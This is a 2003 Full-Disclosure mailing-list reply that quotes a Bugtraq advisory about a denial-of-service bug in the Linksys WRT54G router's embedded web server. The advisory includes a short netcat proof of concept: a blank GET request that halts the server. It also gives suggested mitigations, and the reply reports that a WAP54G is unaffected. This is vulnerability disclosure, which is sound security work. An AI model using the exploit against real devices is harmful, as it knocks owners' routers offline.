Re: [Fwd: Bugtraq: Linksys WRT54G Denial of Service Vulnerability]

["kang () insecure ws" <kang () insecure ws>]

despite being very similar, my WAP54G *isn't* vulnerable
:)
(*Firmware:   v1.08, Aug 05, 2003)*
*
*Michael Renzmann wrote:

> Can anyone confirm if technically identical devices such as the 
> Buffalo WBR-G54 share this vulnerability?
>
> -------- Original Message --------
> Subject: Linksys WRT54G Denial of Service Vulnerability
> Date: 3 Dec 2003 22:35:26 -0000
> From: <test () techcentric net>
> To: bugtraq () securityfocus com
>
>
>
> Linksys WRT54G Denial of Service Vulnerability
>
>
>
>
>
>
>
> System(s)
>
> ===========
>
>
>
> Tested on Linksys WRT54G v1.0 (firmware v 1.42.3)
>
>
>
>
>
> Detail(s)
>
> ===========
>
>
>
> Sending a blank GET request to the router on port 80 (or 8080) halts 
> the embedded webserver.  This may allow an attacker to force the owner 
> to reboot the router, allowing them to gain sensitive information 
> during router authentication.
>
>
>
> Exploitation
>
> ============
>
>
>
> user@test:~$ nc 10.0.0.1 80
>
> GET
>
> user@test:~$ nc 10.0.0.1 80
>
> (UNKNOWN) [10.0.0.1] 80 (http) : Connection refused
>
> user@test:~$
>
>
>
> Solution(s)
>
> ============
>
>
>
> - Https service should continue running for remote      access.
>
> - Scan for sniffers that might be on the network before rebooting and 
> performing any authentication.
>
> - Wait for a vendor patch :)
>
>
>
> Status
>
> ============
>
>
>
> Vendor contacted on 12/03/03.
>
>
>
>
>
> !HAPPY HOLIDAYS!
>
> carbon () techcentric net - 12/02/03
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html